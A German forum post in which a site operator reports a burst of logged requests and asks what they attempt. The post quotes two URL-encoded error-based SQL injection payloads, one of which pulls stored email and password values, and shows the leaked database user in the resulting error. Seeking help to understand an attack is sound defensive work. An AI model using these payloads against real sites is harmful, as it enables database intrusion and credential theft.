Moin,

wenn ein Server-Programm länger als 3 sec läuft, bekomme ich eine Mail.

Heute morgen 5:28 und 5:29 kamen 211 Aufrufe in dieser Form:

/?TID=17540+%2F%2A%2A%2F%27%2F%2A%2A%2FOR%2F%2A%2A%2F1%2F%2A%2A%2FGROUP%2F%2A%2A%2FBY%2F%2A%2A%2FCONCAT%280x6167754e%2C%28SELECT%2F%2A%2A%2FMID%28IFNULL%28USER%28%29%2C%2F%2A%2A%2F0x20%29%2C1%2C55%29%29%2C0x7241306a%2CFLOOR%28RAND%280%29%2A2%29%29%2F%2A%2A%2FHAVING%2F%2A%2A%2FMIN%280%29%23--%2F%2A%2A%2F-

In den SQL-Kommandos werden die Daten mit addslashes behandelt. Wenn ich

?TID=17540+%2F%2A%2A%2F%27%2F%2A%2A%2FOR%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5808%2F%2A%2A%2FFROM%28SELECT%2F%2A%2A%2FCOUNT%28%2A%29%2CCONCAT%280x64757375%2C%28SELECT%2F%2A%2A%2FMID%28%28IFNULL%28CAST%28CONCAT%28_email_tickets_ALT%2C0x3a%2Cuser_kennwort%29%2F%2A%2A%2FAS%2F%2A%2A%2FNCHAR%29%2C0x20%29%29%2C1%2C55%29%2F%2A%2A%2FFROM%2F%2A%2A%2F%60remso%60.%60bia_termine%60%2F%2A%2A%2FORDER%2F%2A%2A%2FBY%2F%2A%2A%2F%60id%60%2F%2A%2A%2FLIMIT%2F%2A%2A%2F856%2C1%29%2C0x4b304e38%2CFLOOR%28RAND%280%29%2A2%29%29x%2F%2A%2A%2FFROM%2F%2A%2A%2FINFORMATION_SCHEMA.PLUGINS%2F%2A%2A%2FGROUP%2F%2A%2A%2FBY%2F%2A%2A%2Fx%29a%29%23%2F%2A%2A%2FcWfa

selbst eingebe, kommt diese Fehlermeldung:

Meldung 08.12.2021 22:21:27  

1062: Duplicate entry 'aguNosmer@localhostrA0j1' for key 'group_key'

#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# welche sprachen sind vorhanden?
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SELECT
 ueb1.sprache
FROM      bia_uebersetzungen ueb1
WHERE     ueb1.tabelle    = 'termine'
AND       ueb1.tabelle_id = '17540 /**/'/**/OR/**/1/**/GROUP/**/BY/**/CONCAT(0x6167754e,(SELECT/**/MID(IFNULL(USER(),/**/0x20),1,55)),0x7241306a,FLOOR(RAND(0)*2))/**/HAVING/**/MIN(0)#--/**/-'

und dann nachmittags nochmals 1616 derartiger Aufrufe.

Allein, um die abzuwehren ist der Server ja beschäftigt. Aber kann das Schaden an den Daten anrichten? Was wird da versucht?

Wenn ich mit phpmyadmin schaue, ist der Schlüsselname group_key in Tabelle bia_uebersetzungen nicht vorhanden.

Gruß, Linuchs